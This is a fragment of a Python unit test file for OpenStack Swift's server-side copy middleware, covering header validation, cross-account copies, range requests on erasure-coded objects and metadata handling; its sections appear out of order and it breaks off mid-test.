None, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
self.ssc = copy.filter_factory({})(self.app)
self.ssc.logger = self.app.logger
self.policy = POLICIES.default
self.app.container_info = dict(self.container_info)
def test_COPY_with_single_range(self):
req = swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Destination': 'c1/o',
'Range': 'bytes=5-10'})
# turn a real body into fragments
segment_size = self.policy.ec_segment_size
real_body = ('asdf' * segment_size)[:-10]
# split it up into chunks
chunks = [real_body[x:x + segment_size]
for x in range(0, len(real_body), segment_size)]
# we need only first chunk to rebuild 5-10 range
fragments = self.policy.pyeclib_driver.encode(chunks[0])
fragment_payloads = []
fragment_payloads.append(fragments)
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments),
self.policy.object_ring.replicas) # sanity
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))}
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
responses += [(201, '', {})] * self.policy.object_ring.replicas
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
put_hdrs = []
def capture_conn(host, port, dev, part, method, path, *args, **kwargs):
if method == 'PUT':
put_hdrs.append(args[0])
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers,
give_connect=capture_conn):
resp = req.get_response(self.ssc)
self.assertEqual(resp.status_int, 201)
expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity
self.assertEqual(expected_puts, len(put_hdrs))
for hdrs in put_hdrs:
# etag should not be copied from source
self.assertNotIn('etag', (h.lower() for h in hdrs))
def test_COPY_with_invalid_ranges(self):
# real body size is segment_size - 10 (just 1 segment)
segment_size = self.policy.ec_segment_size
real_body = ('a' * segment_size)[:-10]
# range is out of real body but in segment size
self._test_invalid_ranges('COPY', real_body,
segment_size, '%s-' % (segment_size - 10))
# range is out of both real body and segment size
self._test_invalid_ranges('COPY', real_body,
segment_size, '%s-' % (segment_size + 10))
def _test_invalid_ranges(self, method, real_body, segment_size, req_range):
# make a request with range starts from more than real size.
body_etag = md5(real_body).hexdigest()
req = swob.Request.blank(
'/v1/a/c/o', method=method,
headers={'Destination': 'c1/o',
'Range': 'bytes=%s' % (req_range)})
fragments = self.policy.pyeclib_driver.encode(real_body)
fragment_payloads = [fragments]
node_fragments = zip(*fragment_payloads)
self.assertEqual(len(node_fragments),
self.policy.object_ring.replicas) # sanity
headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)),
'X-Object-Sysmeta-Ec-Etag': body_etag}
start = int(req_range.split('-')[0])
self.assertTrue(start >= 0) # sanity
title, exp = swob.RESPONSE_REASONS[416]
range_not_satisfiable_body = \
'<html><h1>%s</h1><p>%s</p></html>' % (title, exp)
if start >= segment_size:
responses = [(416, range_not_satisfiable_body, headers)
for i in range(POLICIES.default.ec_ndata)]
else:
responses = [(200, ''.join(node_fragments[i]), headers)
for i in range(POLICIES.default.ec_ndata)]
status_codes, body_iter, headers = zip(*responses)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
# TODO possibly use FakeApp here
with set_http_connect(*status_codes, body_iter=body_iter,
headers=headers, expect_headers=expect_headers):
resp = req.get_response(self.ssc)
self.assertEqual(resp.status_int, 416)
self.assertEqual(resp.content_length, len(range_not_satisfiable_body))
self.assertEqual(resp.body, range_not_satisfiable_body)
self.assertEqual(resp.etag, body_etag)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
| 50.193594
| 79
| 0.580344
|
import mock
import unittest
from hashlib import md5
from six.moves import urllib
from swift.common import swob
from swift.common.middleware import copy
from swift.common.storage_policy import POLICIES
from swift.common.swob import Request, HTTPException
from swift.common.utils import closing_if_possible
from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing
from test.unit.common.middleware.helpers import FakeSwift
from test.unit.proxy.controllers.test_obj import set_http_connect, \
PatchedObjControllerApp
class TestCopyConstraints(unittest.TestCase):
def test_validate_copy_from(self):
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': 'c/o2'})
src_cont, src_obj = copy._check_copy_from_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': 'c/subdir/o2'})
src_cont, src_obj = copy._check_copy_from_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'subdir/o2')
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': '/c/o2'})
src_cont, src_obj = copy._check_copy_from_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
def test_validate_bad_copy_from(self):
req = Request.blank(
'/v/a/c/o',
headers={'x-copy-from': 'bad_object'})
self.assertRaises(HTTPException,
copy._check_copy_from_header, req)
def test_validate_destination(self):
req = Request.blank(
'/v/a/c/o',
headers={'destination': 'c/o2'})
src_cont, src_obj = copy._check_destination_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
req = Request.blank(
'/v/a/c/o',
headers={'destination': 'c/subdir/o2'})
src_cont, src_obj = copy._check_destination_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'subdir/o2')
req = Request.blank(
'/v/a/c/o',
headers={'destination': '/c/o2'})
src_cont, src_obj = copy._check_destination_header(req)
self.assertEqual(src_cont, 'c')
self.assertEqual(src_obj, 'o2')
def test_validate_bad_destination(self):
req = Request.blank(
'/v/a/c/o',
headers={'destination': 'bad_object'})
self.assertRaises(HTTPException,
copy._check_destination_header, req)
class TestServerSideCopyMiddleware(unittest.TestCase):
def setUp(self):
self.app = FakeSwift()
self.ssc = copy.filter_factory({})(self.app)
self.ssc.logger = self.app.logger
def tearDown(self):
self.assertEqual(self.app.unclosed_requests, {})
def call_app(self, req, app=None, expect_exception=False):
if app is None:
app = self.app
self.authorized = []
def authorize(req):
self.authorized.append(req)
if 'swift.authorize' not in req.environ:
req.environ['swift.authorize'] = authorize
req.headers.setdefault("User-Agent", "Bruce Wayne")
status = [None]
headers = [None]
def start_response(s, h, ei=None):
status[0] = s
headers[0] = h
body_iter = app(req.environ, start_response)
body = ''
caught_exc = None
try:
with closing_if_possible(body_iter):
for chunk in body_iter:
body += chunk
except Exception as exc:
if expect_exception:
caught_exc = exc
else:
raise
if expect_exception:
return status[0], headers[0], body, caught_exc
else:
return status[0], headers[0], body
def call_ssc(self, req, **kwargs):
return self.call_app(req, app=self.ssc, **kwargs)
def assertRequestEqual(self, req, other):
self.assertEqual(req.method, other.method)
self.assertEqual(req.path, other.path)
def test_no_object_in_path_pass_through(self):
self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c', method='PUT')
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertEqual(len(self.authorized), 1)
self.assertRequestEqual(req, self.authorized[0])
def test_object_pass_through_methods(self):
for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']:
self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {})
req = Request.blank('/v1/a/c/o', method=method)
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
self.assertEqual(len(self.authorized), 1)
self.assertRequestEqual(req, self.authorized[0])
self.assertNotIn('swift.orig_req_method', req.environ)
def test_basic_put_with_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
self.assertEqual(self.app.swift_sources[0], 'SSC')
self.assertEqual(self.app.swift_sources[1], 'SSC')
self.assertNotIn('swift.orig_req_method', req.environ)
def test_static_large_object_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2?multipart-manifest=get',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1],
('PUT', '/v1/a/c/o2?multipart-manifest=put'))
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_static_large_object(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o2')])
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container(self):
self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container_and_account(self):
self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {},
'passed')
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_non_zero_content_length(self):
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '10',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '400 Bad Request')
def test_copy_non_zero_content_length_with_account(self):
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '10',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '400 Bad Request')
def test_copy_with_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_slashes_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_no_object_in_x_copy_from(self):
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_with_no_object_in_x_copy_from_and_account(self):
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_with_bad_x_copy_from_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_copy_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
def test_copy_server_error_reading_source_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_not_found_reading_source_and_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_with_object_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_object_metadata_and_account(self):
self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_basic_COPY(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
self.assertEqual(req.environ['swift.orig_req_method'], 'COPY')
def test_basic_DLO(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is not sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertNotIn('x-object-manifest', self.app.headers[1])
self.assertNotIn('etag', self.app.headers[1])
def test_basic_DLO_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o?multipart-manifest=get', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy'))
self.assertIn('x-object-manifest', self.app.headers[1])
self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path')
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
def test_COPY_source_metadata(self):
source_headers = {
'x-object-sysmeta-test1': 'copy me',
'x-object-meta-test2': 'copy me too',
'x-object-transient-sysmeta-test3': 'ditto',
'x-object-sysmeta-container-update-override-etag': 'etag val',
'x-object-sysmeta-container-update-override-size': 'size val',
'x-object-sysmeta-container-update-override-foo': 'bar',
'x-delete-at': 'delete-at-time'}
get_resp_headers = source_headers.copy()
get_resp_headers['etag'] = 'source etag'
self.app.register(
'GET', '/v1/a/c/o', swob.HTTPOk,
headers=get_resp_headers, body='passed')
def verify_headers(expected_headers, unexpected_headers,
actual_headers):
for k, v in actual_headers:
if k.lower() in expected_headers:
expected_val = expected_headers.pop(k.lower())
self.assertEqual(expected_val, v)
self.assertNotIn(k.lower(), unexpected_headers)
self.assertFalse(expected_headers)
self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy0'})
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('201 Created', status)
verify_headers(source_headers.copy(), [], resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o-copy0', path)
verify_headers(source_headers.copy(), [], put_headers.items())
self.assertIn('etag', put_headers)
self.assertEqual(put_headers['etag'], 'source etag')
req = Request.blank('/v1/a/c/o-copy0', method='GET')
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('200 OK', status)
verify_headers(source_headers.copy(), [], resp_headers)
self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy1',
'Range': 'bytes=1-2'})
status, resp_headers, body = self.call_ssc(req)
expected_headers = source_headers.copy()
unexpected_headers = (
'x-object-sysmeta-container-update-override-etag',
'x-object-sysmeta-container-update-override-size',
'x-object-sysmeta-container-update-override-foo')
for h in unexpected_headers:
